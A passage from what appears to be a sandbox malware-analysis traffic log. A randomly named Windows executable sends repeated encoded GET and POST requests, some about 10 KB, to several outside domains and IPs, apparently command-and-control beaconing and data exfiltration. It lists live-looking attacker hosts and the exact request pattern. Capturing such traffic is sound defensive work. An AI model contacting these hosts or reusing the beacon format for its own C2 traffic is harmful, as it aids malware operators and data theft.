4 | 192.168.2.4 | 49741 | 45.157.69.194 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
Timestamp | Bytes transferred | Direction | Data
Aug 26, 2024 18:27:57.778049946 CEST | 478 | OUT | GET /l4rw/?3L9l=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.88nn.pro
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Aug 26, 2024 18:27:58.639003992 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:27:58 GMT
                                      Content-Type: text/html
                                      Content-Length: 138
                                      Connection: close
                                      ETag: "667cd175-8a"
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49743 | 37.187.158.211 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
Timestamp | Bytes transferred | Direction | Data
Aug 26, 2024 18:28:04.027951956 CEST | 769 | OUT | POST /t3gh/ HTTP/1.1
                                      Host: www.fontanerourgente.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.fontanerourgente.net
                                      Referer: http://www.fontanerourgente.net/t3gh/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Ascii: 3L9l=Q9wnYURzxwjnmifliDUwxeTrGpibxgcXa8neSI5WmDlTM0wPUxgJfLri5CtwKi07sKzMl9z1CUa2bJJKW+1npSV3+yDk4InftmZ/pbxfyJrroqbFZpebY64LiKqWDTPVJsXdRN3fBfpyl5fB5T6GG9kk19ottWOlunyo9zD3l8FbCNgqpjZlB5e9F4Q10zRR1w==
Aug 26, 2024 18:28:04.901597023 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:28:04 GMT
                                      Server: Apache
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                                      Connection: close
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Página no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/


                                      Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49744 | Destination IP: 37.187.158.211 | Destination Port: 80 | PID: 5356 | Process: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:28:06.565191984 CEST | 789 | OUT | POST /t3gh/ HTTP/1.1
                                      Host: www.fontanerourgente.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.fontanerourgente.net
                                      Referer: http://www.fontanerourgente.net/t3gh/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 221
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Ascii: 3L9l=Q9wnYURzxwjnnGjlkg8w0+ToL5iboQcTa8jeSJ9gmxBTMRUPbTEJeLri3itxXy0ssK/ul/31CUe2bLRKRJporCV1ySDq74nftmZ/pblxyJjrvarFYL2cWa4IlKqWHTPRJsX0RJX5BZlyl5PB5nOFN9kY7dpckGzdr0fl8lLsv8BdOrxw4S4yT56OY/ZB5wsYu+JAeEUx6KzjysqXqpfRGtQ=
                                      Aug 26, 2024 18:28:07.409416914 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:28:07 GMT
                                      Server: Apache
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                                      Connection: close
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Página no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/


                                      Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49745 | Destination IP: 37.187.158.211 | Destination Port: 80 | PID: 5356 | Process: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:28:09.112448931 CEST | 10871 | OUT | POST /t3gh/ HTTP/1.1
                                      Host: www.fontanerourgente.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.fontanerourgente.net
                                      Referer: http://www.fontanerourgente.net/t3gh/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 10301
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Ascii: 3L9l= [TRUNCATED]
                                      Aug 26, 2024 18:28:10.004173040 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:28:09 GMT
                                      Server: Apache
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                                      Connection: close
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Página no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/


                                      Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49746 | Destination IP: 37.187.158.211 | Destination Port: 80 | PID: 5356 | Process: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:28:11.655240059 CEST | 490 | OUT | GET /t3gh/?3L9l=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.fontanerourgente.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:28:12.564043045 CEST  1236               IN         HTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:28:12 GMT
                                      Server: Apache
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                                      Connection: close
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Página no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                      9           192.168.2.4  49747        167.172.133.32  80                5356  C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp                             Bytes transferred  Direction  Data
                                      Aug 26, 2024 18:28:17.715655088 CEST  754                OUT        POST /zctj/ HTTP/1.1
                                      Host: www.onlytradez.club
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.onlytradez.club
                                      Referer: http://www.onlytradez.club/zctj/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Ascii: 3L9l=gQGQ44pjYQij+BrvRZMikOs8xf7OYvYk5ifC2TL6pvfMUQJAwoAHZ40sQOSwK12Wq89AnMnCqp9aus4xo+Ncd9WpbJgkrODfSRlFPlGtOK0DU8Ax3bCB2wiaEdk8hDVKDDr9niGrBhjJcrtySgtmcp5VqfBjb2Q2iBOiINqwRoO6WZ4spmmY1HF5qhF7Xm8Lgg==
                                      Aug 26, 2024 18:28:18.223303080 CEST  369                IN         HTTP/1.1 404 Not Found
                                      Server: nginx/1.26.1
                                      Date: Mon, 26 Aug 2024 16:28:18 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                      10          192.168.2.4  49748        167.172.133.32  80                5356  C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp                             Bytes transferred  Direction  Data
                                      Aug 26, 2024 18:28:20.258405924 CEST  774                OUT        POST /zctj/ HTTP/1.1
                                      Host: www.onlytradez.club
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.onlytradez.club
                                      Referer: http://www.onlytradez.club/zctj/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 221
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Ascii: 3L9l=gQGQ44pjYQij/lXvS6Uizes7tP7OXPYo5iTC2W6/pc7MNyBA3ZAHQo0sbuS1O12Jq8g9nJfCqppauugxpPNdctWrUpg6muDfSRlFPlDwOKMDIcQx3/WC8QiZFdk8wzVWDDrDnjbOBn/JcvlySxt5LZ5T3vB2eUllsgLPOtupMoSce/p24XHPnHhK3mMPalBC7gfDlBOKBjDSSPLv7wt6icw=
                                      Aug 26, 2024 18:28:20.732708931 CEST  369                IN         HTTP/1.1 404 Not Found
                                      Server: nginx/1.26.1
                                      Date: Mon, 26 Aug 2024 16:28:20 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                      11          192.168.2.4  49749        167.172.133.32  80                5356  C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp                             Bytes transferred  Direction  Data
                                      Aug 26, 2024 18:28:22.803288937 CEST  10856              OUT        POST /zctj/ HTTP/1.1
                                      Host: www.onlytradez.club
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.onlytradez.club
                                      Referer: http://www.onlytradez.club/zctj/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 10301
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:28:23.238405943 CEST  369                IN         HTTP/1.1 404 Not Found
                                      Server: nginx/1.26.1
                                      Date: Mon, 26 Aug 2024 16:28:23 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                      12          192.168.2.4  49750        167.172.133.32  80                5356  C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp                             Bytes transferred  Direction  Data
                                      Aug 26, 2024 18:28:25.344281912 CEST  485                OUT        GET /zctj/?3L9l=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.onlytradez.club
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:28:25.802659988 CEST  705                IN         HTTP/1.1 404 Not Found
                                      Server: nginx/1.26.1
                                      Date: Mon, 26 Aug 2024 16:28:25 GMT
                                      Content-Type: text/html
                                      Content-Length: 555
                                      Connection: close
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                      13          192.168.2.4  49751        206.119.82.116  80                5356  C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp                             Bytes transferred  Direction  Data
                                      Aug 26, 2024 18:28:31.092681885 CEST  736                OUT        POST /kyiu/ HTTP/1.1
                                      Host: www.32wxd.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.32wxd.top
                                      Referer: http://www.32wxd.top/kyiu/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Ascii: 3L9l=aBuNv8bUDAAzG/2gJyvugB/BeCJS/nZ/7bgQ1AaHB0UNr9i3XqkN6nG2DkZsJB+x87xV0V19ZKRMyMxk+JAsKpaQo3JqhtnzAx8Z0bNZ0R2H3heuH2gnRsazHN1kh9vRNT1+8N5js1FZOUR7+8xNVhDHJYFxEsljAQDfJmbUO9aAjgFhInNqcecmgqsMWV5fRA==
                                      Aug 26, 2024 18:28:31.993931055 CEST  691                IN         HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:28:31 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                      14          192.168.2.4  49752        206.119.82.116  80                5356  C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp                             Bytes transferred  Direction  Data
                                      Aug 26, 2024 18:28:33.643420935 CEST  756                OUT        POST /kyiu/ HTTP/1.1
                                      Host: www.32wxd.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.32wxd.top
                                      Referer: http://www.32wxd.top/kyiu/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 221
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Ascii: 3L9l=aBuNv8bUDAAzGcugMR3u1R/CSiJS0HZj7bsQ1BuXBC8Nrdy3WvEN5nG2LEZpXx+A87820UJ9ZKVMyOZk/6ovL5aW03J7ltnzAx8Z0bYE0ReH2QOuVDAoSsawNt1kl9uWNT1X8MkEswBZOVh765dCfhDNXoETD5c0Gx2qKle2HvjirGU7ZWs9Oe4V9tl4bWEWKIn2W2CK63ZWZB2ZNEpn4zE=
                                      Aug 26, 2024 18:28:34.542093039 CEST  691                IN         HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:28:34 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      15 | 192.168.2.4 | 49753 | 206.119.82.116 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:28:36.195352077 CEST | 10838 | OUT | POST /kyiu/ HTTP/1.1
                                      Host: www.32wxd.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.32wxd.top
                                      Referer: http://www.32wxd.top/kyiu/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 10301
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Ascii: 3L9l= [TRUNCATED]
                                      Aug 26, 2024 18:28:37.068296909 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:28:36 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      16 | 192.168.2.4 | 49754 | 206.119.82.116 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:28:38.734759092 CEST | 479 | OUT | GET /kyiu/?kZr0=ht-lElyh&3L9l=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k= HTTP/1.1
                                      Host: www.32wxd.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:28:39.659877062 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:28:39 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      17 | 192.168.2.4 | 49755 | 66.29.149.180 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:28:44.727783918 CEST | 733 | OUT | POST /f9bc/ HTTP/1.1
                                      Host: www.jaxo.xyz
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.jaxo.xyz
                                      Referer: http://www.jaxo.xyz/f9bc/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Ascii: 3L9l=3QjmXr4dAreEQKQW43JPjtcekTlejaV21aZ8hFzo3AstnSvCoC2AryeUEwxp/PUucTElNhWbeiwl1/oVyLd2J5+nzw96dpPnGdvXT65BQ0mPP3e8DcyKpjo2DF7yRK+VHFLpA74amfgY5P48xBzPbczIL4XcCztVrFgFdH3WSHFLmfZieFqnYwig0QX77ipTzw==
                                      Aug 26, 2024 18:28:45.337285042 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:28:45 GMT
                                      Server: Apache
                                      Content-Length: 13840
                                      Connection: close
                                      Content-Type: text/html
                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      18 | 192.168.2.4 | 49756 | 66.29.149.180 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:28:47.273401022 CEST | 753 | OUT | POST /f9bc/ HTTP/1.1
                                      Host: www.jaxo.xyz
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.jaxo.xyz
                                      Referer: http://www.jaxo.xyz/f9bc/
                                      Cache-Control: max-age=0
